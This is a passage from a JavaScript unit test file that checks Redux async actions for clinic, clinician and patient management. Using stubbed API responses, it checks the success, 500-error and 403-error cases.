expect(api.user.deleteOAuthProviderAuthorization.withArgs('strava').callCount).to.equal(1);
}); });

// Specs for getAllClinics (paginated clinic listing).
describe('getAllClinics', () => {
it('should trigger GET_CLINICS_SUCCESS and it should call clinics.getAll once for a successful request', () => {
let clinics = [ { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }, ];
let api = { clinics: { getAll: sinon.stub().callsArgWith(1, null, clinics), }, };
// SUCCESS payload echoes the (empty) options object alongside the results.
let expectedActions = [ { type: 'GET_CLINICS_REQUEST' }, { type: 'GET_CLINICS_SUCCESS', payload:
{ clinics : clinics, options: {} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.getAllClinics(api));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.clinics.getAll.callCount).to.equal(1);
});
it('should trigger GET_CLINICS_FAILURE and it should call error once for a failed request', () => {
let api = { clinics: { getAll: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_GETTING_CLINICS);
err.status = 500;
let expectedActions = [ { type: 'GET_CLINICS_REQUEST' }, { type: 'GET_CLINICS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.getAllClinics(api));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_GETTING_CLINICS });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.clinics.getAll.callCount).to.equal(1);
}); });

// Specs for createClinic; success additionally asserts a react-router
// redirect action to /clinic-admin.
describe('createClinic', () => {
it('should trigger CREATE_CLINICS_SUCCESS and it should call clinics.create once and redirect to "clinic-admin" for a successful request', () => {
let clinicReturn = { id: 'new_clinic_id' };
let api = { clinics: { create: sinon.stub().callsArgWith(1, null, clinicReturn) }, };
let expectedActions = [ { type: 'CREATE_CLINIC_REQUEST' }, { type: 'CREATE_CLINIC_SUCCESS', payload: { clinic : clinicReturn } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/clinic-admin' ], method: 'push', }, } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.createClinic(api));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
// Tail of the createClinic success spec.
expect(api.clinics.create.callCount).to.equal(1);
});
it('should trigger CREATE_CLINIC_FAILURE and it should call error once for a failed request', () => {
let api = { clinics: { create: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_CREATING_CLINIC);
err.status = 500;
let expectedActions = [ { type: 'CREATE_CLINIC_REQUEST' }, { type: 'CREATE_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.createClinic(api));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CLINIC });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.clinics.create.callCount).to.equal(1);
}); });

// Specs for fetchClinic (single clinic by id).
describe('fetchClinic', () => {
it('should trigger FETCH_CLINIC_SUCCESS and it should call clinics.get once for a successful request', () => {
let clinic = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], };
let api = { clinics: { get: sinon.stub().callsArgWith(1, null, clinic), }, };
let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_SUCCESS', payload: { clinic : clinic } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchClinic(api, '5f85fbe6686e6bb9170ab5d0'));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.clinics.get.callCount).to.equal(1);
});
it('should trigger FETCH_CLINIC_FAILURE and it should call error once for a failed request', () => {
let api = { clinics: { get: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, };
let err = new
Error(ErrorMessages.ERR_FETCHING_CLINIC);
err.status = 500;
let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchClinic(api, '5f85fbe6686e6bb9170ab5d0'));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINIC });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.clinics.get.callCount).to.equal(1);
}); });

// Specs for fetchClinicsByIds (fans out one clinics.get call per id and keys
// the resulting map by clinic id).
describe('fetchClinicsByIds', () => {
it('should trigger FETCH_CLINICS_BY_IDS_SUCCESS and it should call clinics.get twice for a successful request', () => {
let clinic1 = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], };
let clinic2 = { id: '12f2f123s2e1f1f3s2e11535', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], };
// onCall(n) gives a distinct result per invocation of the same stub.
let api = { clinics: { get: sinon.stub() .onCall(0).callsArgWith(1, null, clinic1) .onCall(1).callsArgWith(1, null, clinic2), }, };
let expectedActions = [ { type: 'FETCH_CLINICS_BY_IDS_REQUEST' }, { type: 'FETCH_CLINICS_BY_IDS_SUCCESS', payload: { clinics : { [clinic1.id]: clinic1, [clinic2.id]: clinic2, } } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchClinicsByIds(api, [clinic1.id, clinic2.id]));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.clinics.get.callCount).to.equal(2);
});
it('should trigger FETCH_CLINICS_BY_IDS_FAILURE and it should call error once for a failed request', () => {
let clinic1 = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name:
// Continuation of the fetchClinicsByIds failure spec: second get call fails,
// yet both calls are still made (callCount 2 asserted below).
'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], };
let clinic2 = { id: '12f2f123s2e1f1f3s2e11535', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], };
let api = { clinics: { get: sinon.stub() .onCall(0).callsArgWith(1, null, clinic1) .onCall(1).callsArgWith(1, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_BY_IDS);
err.status = 500;
let expectedActions = [ { type: 'FETCH_CLINICS_BY_IDS_REQUEST' }, { type: 'FETCH_CLINICS_BY_IDS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchClinicsByIds(api, [clinic1.id, clinic2.id]));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_BY_IDS });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.clinics.get.callCount).to.equal(2);
}); });

// Specs for updateClinic (partial update of clinic profile fields).
describe('updateClinic', () => {
it('should trigger UPDATE_CLINIC_SUCCESS and it should call clinics.update once for a successful request', () => {
let api = { clinics: { update: sinon.stub().callsArgWith(2, null, { name: 'newName' }), }, };
let expectedActions = [ { type: 'UPDATE_CLINIC_REQUEST' }, { type: 'UPDATE_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', clinic: { name: 'newName' } } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.updateClinic(api, '5f85fbe6686e6bb9170ab5d0', { name: 'newName' }));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.clinics.update.callCount).to.equal(1);
});
it('should trigger UPDATE_CLINIC_FAILURE and it should call error once for a failed request', () => {
let api = {
clinics: { update: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_UPDATING_CLINIC);
err.status = 500;
let expectedActions = [ { type: 'UPDATE_CLINIC_REQUEST' }, { type: 'UPDATE_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.updateClinic(api, '5f85fbe6686e6bb9170ab5d0', {name: 'newName'}));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINIC });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.clinics.update.callCount).to.equal(1);
}); });

// Specs for fetchCliniciansFromClinic (clinician roster of one clinic).
describe('fetchCliniciansFromClinic', () => {
// NOTE(review): the spec title says "clinics.inviteClinician" but the code
// stubs and asserts clinics.getCliniciansFromClinic — the title looks like a
// copy/paste slip; confirm and rename the it() description.
it('should trigger FETCH_CLINICIANS_FROM_CLINIC_SUCCESS and it should call clinics.inviteClinician once for a successful request', () => {
let clinicians = [{ clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id', permissions: ['CLINIC_ADMIN'], }, { clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id2', permissions: ['CLINIC_ADMIN'], }, ];
let clinicId = '5f85fbe6686e6bb9170ab5d0';
let api = { clinics: { getCliniciansFromClinic: sinon.stub().callsArgWith(2, null, clinicians), }, };
// SUCCESS payload nests both the clinicId and the clinician list under `results`.
let expectedActions = [ { type: 'FETCH_CLINICIANS_FROM_CLINIC_REQUEST' }, { type: 'FETCH_CLINICIANS_FROM_CLINIC_SUCCESS', payload: { results: { clinicId, clinicians } } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchCliniciansFromClinic(api, clinicId));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.clinics.getCliniciansFromClinic.callCount).to.equal(1);
});
it('should trigger FETCH_CLINICIANS_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => {
let
// Continuation of the fetchCliniciansFromClinic 500-failure spec (completes
// the `let clinicId` declaration started on the previous line). Unlike most
// FAILURE specs, this action also carries a payload with the clinicId.
clinicId = '5f85fbe6686e6bb9170ab5d0';
let api = { clinics: { getCliniciansFromClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC);
err.status = 500;
let expectedActions = [ { type: 'FETCH_CLINICIANS_FROM_CLINIC_REQUEST' }, { type: 'FETCH_CLINICIANS_FROM_CLINIC_FAILURE', error: err, meta: { apiError: { status: 500, body: 'Error!' } }, payload: { clinicId: clinicId }, }, ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchCliniciansFromClinic(api, clinicId));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.clinics.getCliniciansFromClinic.callCount).to.equal(1);
});
// 403 maps to a dedicated UNAUTHORIZED error message rather than the generic one.
it('[403] should trigger FETCH_CLINICIANS_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => {
let clinicId = '5f85fbe6686e6bb9170ab5d0';
let api = { clinics: { getCliniciansFromClinic: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, };
let err = new Error( ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC_UNAUTHORIZED );
err.status = 403;
let expectedActions = [ { type: 'FETCH_CLINICIANS_FROM_CLINIC_REQUEST' }, { type: 'FETCH_CLINICIANS_FROM_CLINIC_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!'
} }, payload: { clinicId: clinicId }, }, ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchCliniciansFromClinic(api, clinicId));
const actions = store.getActions();
expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC_UNAUTHORIZED, });
expectedActions[1].error = actions[1].error;
expect(actions).to.eql(expectedActions);
expect(api.clinics.getCliniciansFromClinic.callCount).to.equal(1);
}); });

// Specs for fetchClinician (single clinician record within a clinic).
describe('fetchClinician', () => {
it('should trigger FETCH_CLINICIAN_SUCCESS and it should call clinics.getClinician once for a successful request', () => {
let clinician = { clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id', permissions: ['CLINIC_ADMIN'], };
let api = { clinics: { getClinician: sinon.stub().callsArgWith(2, null, clinician), }, };
let expectedActions = [ { type: 'FETCH_CLINICIAN_REQUEST' }, { type: 'FETCH_CLINICIAN_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', clinician: clinician } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip: initialState });
store.dispatch(async.fetchClinician(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id'));
const actions = store.getActions();
expect(actions).to.eql(expectedActions);
expect(api.clinics.getClinician.callCount).to.equal(1);
});
it('should trigger FETCH_CLINICIAN_FAILURE and it should call error once for a failed request', () => {
let api = { clinics: { getClinician: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, };
let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIAN);
err.status = 500;
let expectedActions = [ { type: 'FETCH_CLINICIAN_REQUEST' }, { type: 'FETCH_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; });
let store = mockStore({ blip:
initialState }); store.dispatch(async.fetchClinician(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinician.callCount).to.equal(1); }); }); describe('updateClinician', () => { it('should trigger UPDATE_CLINICIAN_SUCCESS and it should call clinics.updateClinician once for a successful request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let clinicianId = 'clinician_id'; let updates = { id: 'clinician_id', email: '<EMAIL>', name: '<NAME>', roles: ['CLINIC_ADMIN', 'PRESCRIBER'], }; let api = { clinics: { updateClinician: sinon.stub().callsArgWith(3, null, {clinicId, clinicianId, updates}), }, }; let expectedActions = [ { type: 'UPDATE_CLINICIAN_REQUEST' }, { type: 'UPDATE_CLINICIAN_SUCCESS', payload: { clinicId, clinicianId, clinician: updates, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinician(api, clinicId, clinicianId, updates)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinician.callCount).to.equal(1); }); it('should trigger UPDATE_CLINICIAN_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { updateClinician: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let updates = { permissions: ['PRESCRIBER'] }; let err = new Error(ErrorMessages.ERR_UPDATING_CLINICIAN); err.status = 500; let expectedActions = [ { type: 'UPDATE_CLINICIAN_REQUEST' }, { type: 'UPDATE_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); 
// --- updateClinician 500-failure assertions, then the [403] unauthorized variant;
// describe('deleteClinicianFromClinic'): success test setup (comment lines added; code byte-identical) ---
store.dispatch(async.updateClinician(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id', updates)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINICIAN }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinician.callCount).to.equal(1); }); it('[403] should trigger UPDATE_CLINICIAN_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { updateClinician: sinon.stub() .callsArgWith(3, { status: 403, body: 'Error!' }, null), }, }; let updates = { permissions: ['PRESCRIBER'], }; let err = new Error(ErrorMessages.ERR_UPDATING_CLINICIAN_UNAUTHORIZED); err.status = 403; let expectedActions = [ { type: 'UPDATE_CLINICIAN_REQUEST' }, { type: 'UPDATE_CLINICIAN_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.updateClinician( api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id', updates ) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINICIAN_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinician.callCount).to.equal(1); }); }); describe('deleteClinicianFromClinic', () => { it('should trigger DELETE_CLINICIAN_FROM_CLINIC_SUCCESS and it should call clinics.deleteClinicianFromClinic once for a successful request', () => { let api = { clinics: { deleteClinicianFromClinic: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'DELETE_CLINICIAN_FROM_CLINIC_REQUEST' }, { type: 'DELETE_CLINICIAN_FROM_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true;
// --- deleteClinicianFromClinic: success dispatch/assertions, 500-failure test, and start of [403] unauthorized test ---
}); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianFromClinic.callCount).to.equal(1); }); it('should trigger DELETE_CLINICIAN_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { deleteClinicianFromClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC); err.status = 500; let expectedActions = [ { type: 'DELETE_CLINICIAN_FROM_CLINIC_REQUEST' }, { type: 'DELETE_CLINICIAN_FROM_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianFromClinic.callCount).to.equal(1); }); it('[403] should trigger DELETE_CLINICIAN_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { deleteClinicianFromClinic: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'DELETE_CLINICIAN_FROM_CLINIC_REQUEST' }, { type: 'DELETE_CLINICIAN_FROM_CLINIC_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!'
// --- close of deleteClinicianFromClinic [403] test; describe('deletePatientFromClinic'):
// success test (verifies callback invoked with null) and start of 500-failure test ---
} }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.deleteClinicianFromClinic( api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id' ) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianFromClinic.callCount).to.equal(1); }); }); describe('deletePatientFromClinic', () => { it('should trigger DELETE_PATIENT_FROM_CLINIC_SUCCESS and it should call clinics.deletePatientFromClinic once for a successful request', () => { let api = { clinics: { deletePatientFromClinic: sinon.stub().callsArgWith(2, null, { foo: 'bar '}), }, }; let expectedActions = [ { type: 'DELETE_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'DELETE_PATIENT_FROM_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', patientId: 'patient_id', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'patient_id', callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientFromClinic.callCount).to.equal(1); // assert callback contains no error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null); }); it('should trigger DELETE_PATIENT_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { const error = {status: 500, body: 'Error!'}; let api = { clinics: { deletePatientFromClinic: sinon.stub().callsArgWith(2, error, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_PATIENT_FROM_CLINIC); err.status = 500; let expectedActions = [ { type: 'DELETE_PATIENT_FROM_CLINIC_REQUEST' }, { type:
// --- deletePatientFromClinic 500-failure assertions (callback receives the error), then [403] test.
// NOTE(review): the [403] test asserts ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED (CLINICIAN,
// not PATIENT) — presumably mirrors the constant the action creator actually dispatches; confirm
// against the async action implementation before "fixing" either side. ---
'DELETE_PATIENT_FROM_CLINIC_FAILURE', error: err, meta: { apiError: error } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'patient_id', callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_PATIENT_FROM_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientFromClinic.callCount).to.equal(1); // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error); }); it('[403] should trigger DELETE_PATIENT_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { const error = { status: 403, body: 'Error!' }; let api = { clinics: { deletePatientFromClinic: sinon.stub().callsArgWith(2, error, null), }, }; let err = new Error( ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'DELETE_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'DELETE_PATIENT_FROM_CLINIC_FAILURE', error: err, meta: { apiError: error }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch( async.deletePatientFromClinic( api, '5f85fbe6686e6bb9170ab5d0', 'patient_id', callback ) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientFromClinic.callCount).to.equal(1); // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error); }); });
// --- describe('deletePatientInvitation'): success test (note: unlike deletePatientFromClinic,
// the success test creates a callback stub but does not assert on it) and 500-failure test;
// then describe('fetchClinicByShareCode') opens. Code byte-identical; comment lines added. ---
describe('deletePatientInvitation', () => { it('should trigger DELETE_PATIENT_INVITATION_SUCCESS and it should call clinics.deletePatientInvitation once for a successful request', () => { let api = { clinics: { deletePatientInvitation: sinon.stub().callsArgWith(2, null, { foo: 'bar '}), }, }; let expectedActions = [ { type: 'DELETE_PATIENT_INVITATION_REQUEST' }, { type: 'DELETE_PATIENT_INVITATION_SUCCESS', payload: { inviteId: 'invite_id', clinicId: '5f85fbe6686e6bb9170ab5d0', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientInvitation(api, '5f85fbe6686e6bb9170ab5d0', 'invite_id', callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientInvitation.callCount).to.equal(1); }); it('should trigger DELETE_PATIENT_INVITATION_FAILURE and it should call error once for a failed request', () => { const error = {status: 500, body: 'Error!'}; let api = { clinics: { deletePatientInvitation: sinon.stub().callsArgWith(2, error, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_PATIENT_INVITATION); err.status = 500; let expectedActions = [ { type: 'DELETE_PATIENT_INVITATION_REQUEST' }, { type: 'DELETE_PATIENT_INVITATION_FAILURE', error: err, meta: { apiError: error } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientInvitation(api, '5f85fbe6686e6bb9170ab5d0', 'invite_id', callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_PATIENT_INVITATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientInvitation.callCount).to.equal(1); }); }); describe('fetchClinicByShareCode', () => {
// --- fetchClinicByShareCode: success test (share-code string dispatch) and 500-failure test;
// then describe('fetchPatientsForClinic') opens with its paginated success fixture ---
it('should trigger FETCH_CLINIC_SUCCESS and it should call clinics.getClinicByShareCode once for a successful request', () => { let clinic = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }; let api = { clinics: { getClinicByShareCode: sinon.stub().callsArgWith(1, null, clinic), }, }; let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_SUCCESS', payload: { clinic, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicByShareCode(api, 'ABCD-EVGR-3393-J48I')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicByShareCode.callCount).to.equal(1); }); it('should trigger FETCH_CLINIC_FAILURE and it should call error once for a failed request', () => { const error = {status: 500, body: 'Error!'}; let api = { clinics: { getClinicByShareCode: sinon.stub().callsArgWith(1, error, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINIC); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_FAILURE', error: err, meta: { apiError: error } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicByShareCode(api, 'ABCD-EVGR-3393-J48I')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicByShareCode.callCount).to.equal(1); }); }); describe('fetchPatientsForClinic', () => { it('should trigger FETCH_PATIENTS_FOR_CLINIC_SUCCESS and it should call clinics.getPatientsForClinic once for a successful request', () => { let patients = [{ clinicId:
// --- fetchPatientsForClinic: success fixture ({data, meta.count} envelope → payload {clinicId, count, patients}),
// then the 500-failure test setup (comment lines added; code byte-identical) ---
'5f85fbe6686e6bb9170ab5d0', patientId: 'patient_id', id: 'relationship_id', }]; let api = { clinics: { getPatientsForClinic: sinon.stub().callsArgWith(2, null, { data: patients, meta: { count: 1 }, }), }, }; let expectedActions = [ { type: 'FETCH_PATIENTS_FOR_CLINIC_REQUEST' }, { type: 'FETCH_PATIENTS_FOR_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', count: 1, patients } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientsForClinic(api, '5f85fbe6686e6bb9170ab5d0')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientsForClinic.callCount).to.equal(1); }); it('should trigger FETCH_PATIENTS_FOR_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { getPatientsForClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new 